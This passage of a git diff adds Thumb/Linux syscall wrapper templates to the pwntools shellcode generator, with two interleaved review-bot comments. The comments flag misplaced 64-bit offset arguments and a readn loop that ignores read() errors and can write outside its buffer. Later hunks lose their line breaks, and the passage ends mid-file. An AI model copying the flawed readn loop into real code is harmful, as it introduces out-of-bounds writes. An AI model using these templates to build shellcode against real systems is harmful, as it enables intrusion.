+Arguments:
+ fd(int): fd
+ iovec(iovec): iovec
+ count(int): count
+ offset(off_t): offset
+
+
+ ${syscall('SYS_preadv', fd, iovec, count, offset)}
diff --git a/pwnlib/shellcraft/templates/thumb/linux/prlimit64.asm b/pwnlib/shellcraft/templates/thumb/linux/prlimit64.asm
new file mode 100644
index 000000000..7f1cb0056
--- /dev/null
+++ b/pwnlib/shellcraft/templates/thumb/linux/prlimit64.asm
@@ -0,0 +1,16 @@
+
+<%
+ from pwnlib.shellcraft.thumb.linux import syscall
+%>
+<%page args="pid, resource, new_limit, old_limit"/>
+<%docstring>
+Invokes the syscall prlimit64. See 'man 2 prlimit64' for more information.
+
+Arguments:
+ pid(pid_t): pid
+ resource(rlimit_resource): resource
+ new_limit(rlimit64): new_limit
+ old_limit(rlimit64): old_limit
+
+
+ ${syscall('SYS_prlimit64', pid, resource, new_limit, old_limit)}
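Review bot: The pread template passes a single 32-bit `offset` as the fourth syscall argument to `SYS_pread`, and the same shape appears in preadv here and in pwrite, pwritev and readahead in the later hunks. On 32-bit ARM these are the 64-bit-offset variants, and the EABI convention places a 64-bit argument in an aligned register pair with the preceding register left as padding, so a plain fourth argument would land in the padding slot and the offset the kernel reads would be whatever is left in the pair; the `SYS_pread` name itself may also be absent from the ARM constants. This is inferred from the calling convention rather than visible in the hunk, so it should be verified against the generated constants and, if confirmed, the docstring should state that `offset` must be supplied as low/high words or the generator should emit the padded form.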
diff --git a/pwnlib/shellcraft/templates/thumb/linux/profil.asm b/pwnlib/shellcraft/templates/thumb/linux/profil.asm
new file mode 100644
index 000000000..e5b48a642
--- /dev/null
+++ b/pwnlib/shellcraft/templates/thumb/linux/profil.asm
@@ -0,0 +1,16 @@
+
+<%
+ from pwnlib.shellcraft.thumb.linux import syscall
+%>
+<%page args="sample_buffer, size, offset, scale"/>
+<%docstring>
+Invokes the syscall profil. See 'man 2 profil' for more information.
+
+Arguments:
+ sample_buffer(unsigned): sample_buffer
+ size(size_t): size
+ offset(size_t): offset
+ scale(unsigned): scale
+
+
+ ${syscall('SYS_profil', sample_buffer, size, offset, scale)}
diff --git a/pwnlib/shellcraft/templates/thumb/linux/ptrace.asm b/pwnlib/shellcraft/templates/thumb/linux/ptrace.asm
new file mode 100644
index 000000000..d36bb9537
--- /dev/null
+++ b/pwnlib/shellcraft/templates/thumb/linux/ptrace.asm
@@ -0,0 +1,14 @@
+
+<%
+ from pwnlib.shellcraft.thumb.linux import syscall
+%>
+<%page args="request, vararg"/>
+<%docstring>
+Invokes the syscall ptrace. See 'man 2 ptrace' for more information.
+
+Arguments:
+ request(ptrace_request): request
+ vararg(int): vararg
+
+
+ ${syscall('SYS_ptrace', request, vararg)}
diff --git a/pwnlib/shellcraft/templates/thumb/linux/push.asm b/pwnlib/shellcraft/templates/thumb/linux/push.asm
deleted file mode 100644
index 8119ea535..000000000
--- a/pwnlib/shellcraft/templates/thumb/linux/push.asm
+++ /dev/null
@@ -1,22 +0,0 @@
-<%
- from pwnlib.shellcraft import thumb
- from pwnlib.context import context as ctx # Ugly hack, mako will not let it be called context
-%>
-<%page args="value"/>
-<%docstring>
-
-Thin wrapper around :func:`pwnlib.shellcraft.thumb.push`, which sets
-`context.os` to `'linux'` before calling.
-
-Example:
-
- >>> print pwnlib.shellcraft.thumb.linux.push('SYS_execve').rstrip()
- /* push 'SYS_execve' */
- mov r1, #11
- push {r1}
-
-
-
-% with ctx.local(os = 'linux'):
- ${thumb.push(value)}
-% endwith
diff --git a/pwnlib/shellcraft/templates/thumb/linux/push.asm b/pwnlib/shellcraft/templates/thumb/linux/push.asm
new file mode 120000
index 000000000..85ff2b0a1
--- /dev/null
+++ b/pwnlib/shellcraft/templates/thumb/linux/push.asm
@@ -0,0 +1 @@
+../push.asm
\ No newline at end of file
diff --git a/pwnlib/shellcraft/templates/thumb/linux/putpmsg.asm b/pwnlib/shellcraft/templates/thumb/linux/putpmsg.asm
new file mode 100644
index 000000000..e28f8bac0
--- /dev/null
+++ b/pwnlib/shellcraft/templates/thumb/linux/putpmsg.asm
@@ -0,0 +1,17 @@
+
+<%
+ from pwnlib.shellcraft.thumb.linux import syscall
+%>
+<%page args="fildes, ctlptr, dataptr, band, flags"/>
+<%docstring>
+Invokes the syscall putpmsg. See 'man 2 putpmsg' for more information.
+
+Arguments:
+ fildes(int): fildes
+ ctlptr(strbuf): ctlptr
+ dataptr(strbuf): dataptr
+ band(int): band
+ flags(int): flags
+
+
+ ${syscall('SYS_putpmsg', fildes, ctlptr, dataptr, band, flags)}
diff --git a/pwnlib/shellcraft/templates/thumb/linux/pwrite.asm b/pwnlib/shellcraft/templates/thumb/linux/pwrite.asm
new file mode 100644
index 000000000..5487878f4
--- /dev/null
+++ b/pwnlib/shellcraft/templates/thumb/linux/pwrite.asm
@@ -0,0 +1,16 @@
+
+<%
+ from pwnlib.shellcraft.thumb.linux import syscall
+%>
+<%page args="fd, buf, n, offset"/>
+<%docstring>
+Invokes the syscall pwrite. See 'man 2 pwrite' for more information.
+
+Arguments:
+ fd(int): fd
+ buf(void): buf
+ n(size_t): n
+ offset(off_t): offset
+
+
+ ${syscall('SYS_pwrite', fd, buf, n, offset)}
diff --git a/pwnlib/shellcraft/templates/thumb/linux/pwritev.asm b/pwnlib/shellcraft/templates/thumb/linux/pwritev.asm
new file mode 100644
index 000000000..8a480802e
--- /dev/null
+++ b/pwnlib/shellcraft/templates/thumb/linux/pwritev.asm
@@ -0,0 +1,16 @@
+
+<%
+ from pwnlib.shellcraft.thumb.linux import syscall
+%>
+<%page args="fd, iovec, count, offset"/>
+<%docstring>
+Invokes the syscall pwritev. See 'man 2 pwritev' for more information.
+
+Arguments:
+ fd(int): fd
+ iovec(iovec): iovec
+ count(int): count
+ offset(off_t): offset
+
+
+ ${syscall('SYS_pwritev', fd, iovec, count, offset)}
diff --git a/pwnlib/shellcraft/templates/thumb/linux/read.asm b/pwnlib/shellcraft/templates/thumb/linux/read.asm
new file mode 100644
index 000000000..b21b6d006
--- /dev/null
+++ b/pwnlib/shellcraft/templates/thumb/linux/read.asm
@@ -0,0 +1,15 @@
+
+<%
+ from pwnlib.shellcraft.thumb.linux import syscall
+%>
+<%page args="fd, buf, nbytes"/>
+<%docstring>
+Invokes the syscall read. See 'man 2 read' for more information.
+
+Arguments:
+ fd(int): fd
+ buf(void): buf
+ nbytes(size_t): nbytes
+
+
+ ${syscall('SYS_read', fd, buf, nbytes)}
diff --git a/pwnlib/shellcraft/templates/thumb/linux/readahead.asm b/pwnlib/shellcraft/templates/thumb/linux/readahead.asm
new file mode 100644
index 000000000..93897d679
--- /dev/null
+++ b/pwnlib/shellcraft/templates/thumb/linux/readahead.asm
@@ -0,0 +1,15 @@
+
+<%
+ from pwnlib.shellcraft.thumb.linux import syscall
+%>
+<%page args="fd, offset, count"/>
+<%docstring>
+Invokes the syscall readahead. See 'man 2 readahead' for more information.
+
+Arguments:
+ fd(int): fd
+ offset(off64_t): offset
+ count(size_t): count
+
+
+ ${syscall('SYS_readahead', fd, offset, count)}
diff --git a/pwnlib/shellcraft/templates/thumb/linux/readdir.asm b/pwnlib/shellcraft/templates/thumb/linux/readdir.asm
new file mode 100644
index 000000000..33c6d862f
--- /dev/null
+++ b/pwnlib/shellcraft/templates/thumb/linux/readdir.asm
@@ -0,0 +1,13 @@
+
+<%
+ from pwnlib.shellcraft.thumb.linux import syscall
+%>
+<%page args="dirp"/>
+<%docstring>
+Invokes the syscall readdir. See 'man 2 readdir' for more information.
+
+Arguments:
+ dirp(DIR): dirp
+
+
+ ${syscall('SYS_readdir', dirp)}
diff --git a/pwnlib/shellcraft/templates/thumb/linux/readlink.asm b/pwnlib/shellcraft/templates/thumb/linux/readlink.asm
new file mode 100644
index 000000000..d7eecd100
--- /dev/null
+++ b/pwnlib/shellcraft/templates/thumb/linux/readlink.asm
@@ -0,0 +1,15 @@
+
+<%
+ from pwnlib.shellcraft.thumb.linux import syscall
+%>
+<%page args="path, buf, len"/>
+<%docstring>
+Invokes the syscall readlink. See 'man 2 readlink' for more information.
+
+Arguments:
+ path(char): path
+ buf(char): buf
+ len(size_t): len
+
+
+ ${syscall('SYS_readlink', path, buf, len)}
diff --git a/pwnlib/shellcraft/templates/thumb/linux/readlinkat.asm b/pwnlib/shellcraft/templates/thumb/linux/readlinkat.asm
new file mode 100644
index 000000000..e41ad4b27
--- /dev/null
+++ b/pwnlib/shellcraft/templates/thumb/linux/readlinkat.asm
@@ -0,0 +1,16 @@
+
+<%
+ from pwnlib.shellcraft.thumb.linux import syscall
+%>
+<%page args="fd, path, buf, len"/>
+<%docstring>
+Invokes the syscall readlinkat. See 'man 2 readlinkat' for more information.
+
+Arguments:
+ fd(int): fd
+ path(char): path
+ buf(char): buf
+ len(size_t): len
+
+
+ ${syscall('SYS_readlinkat', fd, path, buf, len)}
diff --git a/pwnlib/shellcraft/templates/thumb/linux/readn.asm b/pwnlib/shellcraft/templates/thumb/linux/readn.asm
new file mode 100644
index 000000000..c248dda07
--- /dev/null
+++ b/pwnlib/shellcraft/templates/thumb/linux/readn.asm
@@ -0,0 +1,23 @@
+<%
+ from pwnlib.shellcraft.thumb.linux import read
+ from pwnlib.shellcraft.thumb import setregs
+ from pwnlib.shellcraft import common
+%>
+<%page args="fd, buf, nbytes"/>
+<%docstring>
+Reads exactly nbytes bytes from file descriptor fd into the buffer buf.
+
+Arguments:
+ fd(int): fd
+ buf(void): buf
+ nbytes(size_t): nbytes
+
+<%
+readn_loop = common.label('readn_loop')
+%>
+ ${setregs({'r3': buf, 'r4': nbytes})}
+${readn_loop}:
+ ${read(fd, 'r3', 'r4')}
+ add r3, r3, r0
+ subs r4, r4, r0
+ bne ${readn_loop}
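Review bot: The `readn_loop` in readn.asm never examines the value read() leaves in r0 before `add r3, r3, r0` / `subs r4, r4, r0`, so a zero return (EOF or a closed descriptor) spins forever and a negative return (-errno) moves the pointer backwards and inflates the remaining count, so the next iteration reads into memory outside `buf`. A guard between the read and the arithmetic, `cmp r0, #0` followed by `ble ${readn_done}`, with `readn_done = common.label('readn_done')` emitted next to `readn_loop` and the label placed after the `bne`, keeps the loop inside the caller's buffer. The docstring should also say that the loop only exits once exactly nbytes have been consumed, since that is the contract callers rely on.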
diff --git a/pwnlib/shellcraft/templates/thumb/linux/readv.asm b/pwnlib/shellcraft/templates/thumb/linux/readv.asm
new file mode 100644
index 000000000..aab81082e
--- /dev/null
+++ b/pwnlib/shellcraft/templates/thumb/linux/readv.asm
@@ -0,0 +1,15 @@
+
+<%
+ from pwnlib.shellcraft.thumb.linux import syscall
+%>
+<%page args="fd, iovec, count"/>
+<%docstring>
+Invokes the syscall readv. See 'man 2 readv' for more information.
+
+Arguments:
+ fd(int): fd
+ iovec(iovec): iovec
+ count(int): count
+
+
+ ${syscall('SYS_readv', fd, iovec, count)}
diff --git a/pwnlib/shellcraft/templates/thumb/linux/recv.asm b/pwnlib/shellcraft/templates/thumb/linux/recv.asm
new file mode 100644
index 000000000..85ba493b4
--- /dev/null
+++ b/pwnlib/shellcraft/templates/thumb/linux/recv.asm
@@ -0,0 +1,16 @@
+
+<%
+ from pwnlib.shellcraft.thumb.linux import syscall
+%>
+<%page args="fd, buf, n, flags"/>
+<%docstring>
+Invokes the syscall recv. See 'man 2 recv' for more information.
+
+Arguments:
+ fd(int): fd
+ buf(void): buf
+ n(size_t): n
+ flags(int): flags
+
+
+ ${syscall('SYS_recv', fd, buf, n, flags)}
diff --git a/pwnlib/shellcraft/templates/thumb/linux/recvfrom.asm b/pwnlib/shellcraft/templates/thumb/linux/recvfrom.asm
new file mode 100644
index 000000000..72d6d323e
--- /dev/null
+++ b/pwnlib/shellcraft/templates/thumb/linux/recvfrom.asm
@@ -0,0 +1,18 @@
+
+<%
+ from pwnlib.shellcraft.thumb.linux import syscall
+%>
+<%page args="fd, buf, n, flags, addr, addr_len"/>
+<%docstring>
+Invokes the syscall recvfrom. See 'man 2 recvfrom' for more information.
+
+Arguments:
+ fd(int): fd
+ buf(void): buf
+ n(size_t): n
+ flags(int): flags
+ addr(SOCKADDR_ARG): addr
+ addr_len(socklen_t): addr_len
+
+
+ ${syscall('SYS_recvfrom', fd, buf, n, flags, addr, addr_len)}
diff --git a/pwnlib/shellcraft/templates/thumb/linux/recvmmsg.asm b/pwnlib/shellcraft/templates/thumb/linux/recvmmsg.asm
new file mode 100644
index 000000000..948be48f4
--- /dev/null
+++ b/pwnlib/shellcraft/templates/thumb/linux/recvmmsg.asm
@@ -0,0 +1,17 @@
+
+<%
+ from pwnlib.shellcraft.thumb.linux import syscall
+%>
+<%page args="fd, vmessages, vlen, flags, tmo"/>
+<%docstring>
+Invokes the syscall recvmmsg. See 'man 2 recvmmsg' for more information.
+
+Arguments:
+ fd(int): fd
+ vmessages(mmsghdr): vmessages
+ vlen(unsigned): vlen
+ flags(int): flags
+ tmo(timespec): tmo
+
+
+ ${syscall('SYS_recvmmsg', fd, vmessages, vlen, flags, tmo)}
diff --git a/pwnlib/shellcraft/templates/thumb/linux/recvmsg.asm b/pwnlib/shellcraft/templates/thumb/linux/recvmsg.asm
new file mode 100644
index 000000000..29ca168e6
--- /dev/null
+++ b/pwnlib/shellcraft/templates/thumb/linux/recvmsg.asm
@@ -0,0 +1,15 @@
+
+<%
+ from pwnlib.shellcraft.thumb.linux import syscall
+%>
+<%page args="fd, message, flags"/>
+<%docstring>
+Invokes the syscall recvmsg. See 'man 2 recvmsg' for more information.
+
+Arguments:
+ fd(int): fd
+ message(msghdr): message
+ flags(int): flags
+
+
+ ${syscall('SYS_recvmsg', fd, message, flags)}
diff --git a/pwnlib/shellcraft/templates/thumb/linux/remap_file_pages.asm b/pwnlib/shellcraft/templates/thumb/linux/remap_file_pages.asm
new file mode 100644
index 000000000..24e4390ad
--- /dev/null
+++ b/pwnlib/shellcraft/templates/thumb/linux/remap_file_pages.asm
@@ -0,0 +1,17 @@
+
+<%
+ from pwnlib.shellcraft.thumb.linux import syscall
+%>
+<%page args="start, size, prot, pgoff, flags"/>
+<%docstring>
+Invokes the syscall remap_file_pages. See 'man 2 remap_file_pages' for more information.
+
+Arguments:
+ start(void): start
+ size(size_t): size
+ prot(int): prot
+ pgoff(size_t): pgoff
+ flags(int): flags
+
+
+ ${syscall('SYS_remap_file_pages', start, size, prot, pgoff, flags)}
diff --git a/pwnlib/shellcraft/templates/thumb/linux/rename.asm b/pwnlib/shellcraft/templates/thumb/linux/rename.asm
new file mode 100644
index 000000000..2498c1585
--- /dev/null
+++ b/pwnlib/shellcraft/templates/thumb/linux/rename.asm
@@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="old, new"/> +<%docstring> +Invokes the syscall rename. See 'man 2 rename' for more information. + +Arguments: + old(char): old + new(char): new + + + ${syscall('SYS_rename', old, new)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/renameat.asm b/pwnlib/shellcraft/templates/thumb/linux/renameat.asm new file mode 100644 index 000000000..767fdf4b2 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/renameat.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="oldfd, old, newfd, new"/> +<%docstring> +Invokes the syscall renameat. See 'man 2 renameat' for more information. + +Arguments: + oldfd(int): oldfd + old(char): old + newfd(int): newfd + new(char): new + + + ${syscall('SYS_renameat', oldfd, old, newfd, new)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/rmdir.asm b/pwnlib/shellcraft/templates/thumb/linux/rmdir.asm new file mode 100644 index 000000000..6e5b13eb4 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/rmdir.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="path"/> +<%docstring> +Invokes the syscall rmdir. See 'man 2 rmdir' for more information. + +Arguments: + path(char): path + + + ${syscall('SYS_rmdir', path)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/sched_get_priority_max.asm b/pwnlib/shellcraft/templates/thumb/linux/sched_get_priority_max.asm new file mode 100644 index 000000000..719a881b9 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/sched_get_priority_max.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="algorithm"/> +<%docstring> +Invokes the syscall sched_get_priority_max. See 'man 2 sched_get_priority_max' for more information. + +Arguments: + algorithm(int): algorithm + + + ${syscall('SYS_sched_get_priority_max', algorithm)} 
diff --git a/pwnlib/shellcraft/templates/thumb/linux/sched_get_priority_min.asm b/pwnlib/shellcraft/templates/thumb/linux/sched_get_priority_min.asm new file mode 100644 index 000000000..485e25ea2 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/sched_get_priority_min.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="algorithm"/> +<%docstring> +Invokes the syscall sched_get_priority_min. See 'man 2 sched_get_priority_min' for more information. + +Arguments: + algorithm(int): algorithm + + + ${syscall('SYS_sched_get_priority_min', algorithm)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/sched_getaffinity.asm b/pwnlib/shellcraft/templates/thumb/linux/sched_getaffinity.asm new file mode 100644 index 000000000..8e85552de --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/sched_getaffinity.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="pid, cpusetsize, cpuset"/> +<%docstring> +Invokes the syscall sched_getaffinity. See 'man 2 sched_getaffinity' for more information. + +Arguments: + pid(pid_t): pid + cpusetsize(size_t): cpusetsize + cpuset(cpu_set_t): cpuset + + + ${syscall('SYS_sched_getaffinity', pid, cpusetsize, cpuset)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/sched_getparam.asm b/pwnlib/shellcraft/templates/thumb/linux/sched_getparam.asm new file mode 100644 index 000000000..375106e32 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/sched_getparam.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="pid, param"/> +<%docstring> +Invokes the syscall sched_getparam. See 'man 2 sched_getparam' for more information. + +Arguments: + pid(pid_t): pid + param(sched_param): param + + + ${syscall('SYS_sched_getparam', pid, param)} 
diff --git a/pwnlib/shellcraft/templates/thumb/linux/sched_getscheduler.asm b/pwnlib/shellcraft/templates/thumb/linux/sched_getscheduler.asm new file mode 100644 index 000000000..bb4c28d06 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/sched_getscheduler.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="pid"/> +<%docstring> +Invokes the syscall sched_getscheduler. See 'man 2 sched_getscheduler' for more information. + +Arguments: + pid(pid_t): pid + + + ${syscall('SYS_sched_getscheduler', pid)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/sched_rr_get_interval.asm b/pwnlib/shellcraft/templates/thumb/linux/sched_rr_get_interval.asm new file mode 100644 index 000000000..f01fc89b9 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/sched_rr_get_interval.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="pid, t"/> +<%docstring> +Invokes the syscall sched_rr_get_interval. See 'man 2 sched_rr_get_interval' for more information. + +Arguments: + pid(pid_t): pid + t(timespec): t + + + ${syscall('SYS_sched_rr_get_interval', pid, t)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/sched_setaffinity.asm b/pwnlib/shellcraft/templates/thumb/linux/sched_setaffinity.asm new file mode 100644 index 000000000..427c68081 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/sched_setaffinity.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="pid, cpusetsize, cpuset"/> +<%docstring> +Invokes the syscall sched_setaffinity. See 'man 2 sched_setaffinity' for more information. + +Arguments: + pid(pid_t): pid + cpusetsize(size_t): cpusetsize + cpuset(cpu_set_t): cpuset + + + ${syscall('SYS_sched_setaffinity', pid, cpusetsize, cpuset)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/sched_setparam.asm b/pwnlib/shellcraft/templates/thumb/linux/sched_setparam.asm new file mode 100644 index 000000000..8b2d93a87 
--- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/sched_setparam.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="pid, param"/> +<%docstring> +Invokes the syscall sched_setparam. See 'man 2 sched_setparam' for more information. + +Arguments: + pid(pid_t): pid + param(sched_param): param + + + ${syscall('SYS_sched_setparam', pid, param)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/sched_setscheduler.asm b/pwnlib/shellcraft/templates/thumb/linux/sched_setscheduler.asm new file mode 100644 index 000000000..ae596fe22 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/sched_setscheduler.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="pid, policy, param"/> +<%docstring> +Invokes the syscall sched_setscheduler. See 'man 2 sched_setscheduler' for more information. + +Arguments: + pid(pid_t): pid + policy(int): policy + param(sched_param): param + + + ${syscall('SYS_sched_setscheduler', pid, policy, param)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/sched_yield.asm b/pwnlib/shellcraft/templates/thumb/linux/sched_yield.asm new file mode 100644 index 000000000..3503e9173 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/sched_yield.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall sched_yield. See 'man 2 sched_yield' for more information. + +Arguments: + + + + ${syscall('SYS_sched_yield')} diff --git a/pwnlib/shellcraft/templates/thumb/linux/select.asm b/pwnlib/shellcraft/templates/thumb/linux/select.asm new file mode 100644 index 000000000..09ab749bb --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/select.asm 
@@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="nfds, readfds, writefds, exceptfds, timeout"/> +<%docstring> +Invokes the syscall select. See 'man 2 select' for more information. + +Arguments: + nfds(int): nfds + readfds(fd_set): readfds + writefds(fd_set): writefds + exceptfds(fd_set): exceptfds + timeout(timeval): timeout + + + ${syscall('SYS_select', nfds, readfds, writefds, exceptfds, timeout)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/sendfile.asm b/pwnlib/shellcraft/templates/thumb/linux/sendfile.asm new file mode 100644 index 000000000..4aaa97cb4 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/sendfile.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="out_fd, in_fd, offset, count"/> +<%docstring> +Invokes the syscall sendfile. See 'man 2 sendfile' for more information. + +Arguments: + out_fd(int): out_fd + in_fd(int): in_fd + offset(off_t): offset + count(size_t): count + + + ${syscall('SYS_sendfile', out_fd, in_fd, offset, count)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/sendfile64.asm b/pwnlib/shellcraft/templates/thumb/linux/sendfile64.asm new file mode 100644 index 000000000..273e58739 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/sendfile64.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="out_fd, in_fd, offset, count"/> +<%docstring> +Invokes the syscall sendfile64. See 'man 2 sendfile64' for more information. + +Arguments: + out_fd(int): out_fd + in_fd(int): in_fd + offset(off64_t): offset + count(size_t): count + + + ${syscall('SYS_sendfile64', out_fd, in_fd, offset, count)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/setdomainname.asm b/pwnlib/shellcraft/templates/thumb/linux/setdomainname.asm new file mode 100644 index 000000000..861068c01 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/setdomainname.asm 
@@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="name, len"/> +<%docstring> +Invokes the syscall setdomainname. See 'man 2 setdomainname' for more information. + +Arguments: + name(char): name + len(size_t): len + + + ${syscall('SYS_setdomainname', name, len)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/setgid.asm b/pwnlib/shellcraft/templates/thumb/linux/setgid.asm new file mode 100644 index 000000000..6618fc6cc --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/setgid.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="gid"/> +<%docstring> +Invokes the syscall setgid. See 'man 2 setgid' for more information. + +Arguments: + gid(gid_t): gid + + + ${syscall('SYS_setgid', gid)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/setgroups.asm b/pwnlib/shellcraft/templates/thumb/linux/setgroups.asm new file mode 100644 index 000000000..0c85fa71f --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/setgroups.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="n, groups"/> +<%docstring> +Invokes the syscall setgroups. See 'man 2 setgroups' for more information. + +Arguments: + n(size_t): n + groups(gid_t): groups + + + ${syscall('SYS_setgroups', n, groups)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/sethostname.asm b/pwnlib/shellcraft/templates/thumb/linux/sethostname.asm new file mode 100644 index 000000000..6effc6961 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/sethostname.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="name, len"/> +<%docstring> +Invokes the syscall sethostname. See 'man 2 sethostname' for more information. + +Arguments: + name(char): name + len(size_t): len + + + ${syscall('SYS_sethostname', name, len)} 
diff --git a/pwnlib/shellcraft/templates/thumb/linux/setitimer.asm b/pwnlib/shellcraft/templates/thumb/linux/setitimer.asm new file mode 100644 index 000000000..8ac1ac4d1 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/setitimer.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="which, new, old"/> +<%docstring> +Invokes the syscall setitimer. See 'man 2 setitimer' for more information. + +Arguments: + which(itimer_which_t): which + new(itimerval): new + old(itimerval): old + + + ${syscall('SYS_setitimer', which, new, old)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/setpgid.asm b/pwnlib/shellcraft/templates/thumb/linux/setpgid.asm new file mode 100644 index 000000000..1a973ec42 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/setpgid.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="pid, pgid"/> +<%docstring> +Invokes the syscall setpgid. See 'man 2 setpgid' for more information. + +Arguments: + pid(pid_t): pid + pgid(pid_t): pgid + + + ${syscall('SYS_setpgid', pid, pgid)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/setpriority.asm b/pwnlib/shellcraft/templates/thumb/linux/setpriority.asm new file mode 100644 index 000000000..acab5628d --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/setpriority.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="which, who, prio"/> +<%docstring> +Invokes the syscall setpriority. See 'man 2 setpriority' for more information. + +Arguments: + which(priority_which_t): which + who(id_t): who + prio(int): prio + + + ${syscall('SYS_setpriority', which, who, prio)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/setregid.asm b/pwnlib/shellcraft/templates/thumb/linux/setregid.asm new file mode 100644 index 000000000..f169a7b67 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/setregid.asm 
@@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="rgid, egid"/> +<%docstring> +Invokes the syscall setregid. See 'man 2 setregid' for more information. + +Arguments: + rgid(gid_t): rgid + egid(gid_t): egid + + + ${syscall('SYS_setregid', rgid, egid)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/setresgid.asm b/pwnlib/shellcraft/templates/thumb/linux/setresgid.asm new file mode 100644 index 000000000..4e9fd0090 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/setresgid.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="rgid, egid, sgid"/> +<%docstring> +Invokes the syscall setresgid. See 'man 2 setresgid' for more information. + +Arguments: + rgid(gid_t): rgid + egid(gid_t): egid + sgid(gid_t): sgid + + + ${syscall('SYS_setresgid', rgid, egid, sgid)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/setresuid.asm b/pwnlib/shellcraft/templates/thumb/linux/setresuid.asm new file mode 100644 index 000000000..6cc964e17 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/setresuid.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="ruid, euid, suid"/> +<%docstring> +Invokes the syscall setresuid. See 'man 2 setresuid' for more information. + +Arguments: + ruid(uid_t): ruid + euid(uid_t): euid + suid(uid_t): suid + + + ${syscall('SYS_setresuid', ruid, euid, suid)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/setreuid.asm b/pwnlib/shellcraft/templates/thumb/linux/setreuid.asm new file mode 100644 index 000000000..58a3e16e1 --- /dev/null +++ 